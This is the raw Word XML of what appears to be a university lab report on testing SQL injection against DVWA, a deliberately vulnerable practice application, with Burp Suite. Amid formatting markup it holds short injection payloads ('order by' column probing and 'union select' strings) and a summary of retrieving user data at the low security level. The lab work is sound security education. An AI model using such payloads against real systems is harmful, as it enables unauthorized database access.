                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image4.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:srcRect b="32160" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6029325" cy="343757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id=1’ order by 1#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">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9325" cy="3683000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904024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02932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id=1’ order by 2#</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="6029325" cy="2755900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904025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02932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id=1’ order by 3#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">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9325" cy="933853"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1519040251" name="image5.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image5.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:srcRect b="73139" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6029325" cy="93385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 1’ union select 1#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">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9325" cy="1097899"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1519040252" name="image6.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image6.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>
                          <a:srcRect b="64750" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6029325" cy="109789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id=1' union select 1,2#</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">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7375" cy="2857500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="151904025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667375" cy="2857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11"/>
        <w:tblW w:w="9782.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C1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="264"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Results/Output:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="3242" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">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launching DVWA and setting the security level to "low," we tested the SQL Injection vulnerability on the login page.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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Burp Suite, we intercepted and modified the HTTP request to inject SQL statements into the input fields.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">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returned unauthorized access to the database, allowing us to retrieve user information, which confirmed that the SQL Injection vulnerability existed and could be exploited.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">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higher security levels, we found that proper sanitization and input validation prevented the SQL Injection attack, indicating effective mitigation techniques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">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12"/>
        <w:tblW w:w="9782.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C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="264"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tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="795" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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DVWA testing revealed critical vulnerabilities, including SQL injection, emphasizing the importance of secure coding practices and web application security measures.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">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A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId33" w:type="default"/>
      <w:headerReference r:id="rId34" w:type="first"/>
      <w:headerReference r:id="rId35" w:type="even"/>
      <w:footerReference r:id="rId36" w:type="default"/>
      <w:footerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38" w:type="even"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="810" w:top="1440" w:left="900" w:right="566" w:header="45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Fonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:color w:val="000000"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Department of Computer Engineering           Information Security - Sem-VI  </w:t>
      <w:tab/>
      <w:t xml:space="preserve">                                          Jan-May 2025</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tabs>
        <w:tab w:val="left" w:leader="none" w:pos="2930"/>
      </w:tabs>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0" distT="0" distL="0" distR="0">
          <wp:extent cx="1421803" cy="416602"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr descr="A close up of a sign&#10;&#10;Description automatically generated" id="1519040254" name="image8.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="A close up of a sign&#10;&#10;Description automatically generated" id="0" name="image8.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1421803" cy="416602"/>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c00000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Somaiya Vidyavihar University</w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="114300" distR="114300">
          <wp:extent cx="493747" cy="344866"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="1519040255"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493747" cy="34486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Rule="auto"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gjdgxs" w:id="1"/>
    <w:bookmarkEnd w:id="1"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="1"/>
        <w:color w:val="c00000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">K J Somaiya School of Engineering</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767C3"/>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="mr-IN"/>
    </w:rPr>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szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>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ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="0020746A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00EC306E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:cs="Tahoma" w:hAnsi="Tahoma"/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BalloonTextChar" w:customStyle="1">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:rsid w:val="00EC306E"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:cs="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00451901"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HeaderChar" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00451901"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00451901"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00451901"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00710228"/>
    <w:rPr>
      <w:color w:val="0000ff" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00172388"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ar-SA" w:eastAsia="zh-CN" w:val="en-US"/>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0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a0" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a1" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a2" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a3" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a7" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a8" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="a9" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="aa" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="ac" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="ad" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="ae" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af1" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af2" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af3" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af4" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af5" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af6" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="af7" w:customStyle="1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblInd w:w="0.0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="115.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="000A523F"/>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3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 